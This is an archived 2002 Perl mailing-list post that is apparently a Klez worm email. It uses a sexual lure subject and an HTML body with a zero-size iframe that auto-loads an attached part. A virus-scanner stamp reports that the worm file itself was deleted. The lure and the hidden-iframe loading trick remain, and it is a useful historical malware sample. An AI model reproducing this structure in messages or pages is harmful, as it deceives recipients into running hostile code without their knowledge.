Newsgroups: perl.modules
Path: nntp.perl.org
Xref: nntp.perl.org perl.modules:13318
Return-Path: <knight@wxunicom.com>
Mailing-List: contact modules-help@perl.org; run by ezmlm
Delivered-To: mailing list modules@perl.org
Received: (qmail 85460 invoked by uid 76); 20 Aug 2002 23:57:03 -0000
Received: from [211.90.131.186] (HELO mail.wxunicom.com) (211.90.131.186)
  by onion.perl.org (qpsmtpd/0.07b) with SMTP; Tue Aug 20 23:57:03 2002 -0000
Received: from BackupServer ([127.0.0.1])
        by mail.wxunicom.com (Merak 4.2.2) with SMTP id 05FCC038
        for <modules@perl.org>; Wed, 21 Aug 2002 07:56:07 +0800
Received: from 12.234.141.72 by BackupServer (InterScan E-Mail VirusWall NT); Wed, 21 Aug 2002 07:56:03 +0800
To: modules@perl.org
Subject: Japanese lass' sexy pictures
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPartTM-000-afb94bd9-943c-42ca-9006-6abd72520cd8"
Approved: news@nntp.perl.org
From: buzz@bear.com (buzz)
Date: Tue, 20 August 2002 16:57:09 -0700
Message-ID: <perl.modules-13318@nntp.perl.org>

------=_NextPartTM-000-afb94bd9-943c-42ca-9006-6abd72520cd8
Content-Type: multipart/alternative;
	boundary=OW2l7m6SF657181

--OW2l7m6SF657181
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:W7Yl2n13Cd8 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--OW2l7m6SF657181
--OW2l7m6SF657181
Content-Type: application/octet-stream;
	name=CAIRYNQD.htm
Content-Transfer-Encoding: base64
Content-ID: <W7Yl2n13Cd8>

R1NQVmVyc2lvbjozOjQuMQpFbmNvZGluZzoxMDpJU08tODg1OS0xCgoKUmFua18xOjE6OQoK
--OW2l7m6SF657181--



------=_NextPartTM-000-afb94bd9-943c-42ca-9006-6abd72520cd8
Content-Type: text/plain;
	name="InterScan_SafeStamp.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
	filename="InterScan_SafeStamp.txt"

****** Message from InterScan E-Mail VirusWall NT ******

** WARNING! Attached file CAIRYNQD.scr contains:

     WORM_KLEZ.H virus

   It has been deleted.
*****************     End of message     ***************


------=_NextPartTM-000-afb94bd9-943c-42ca-9006-6abd72520cd8--
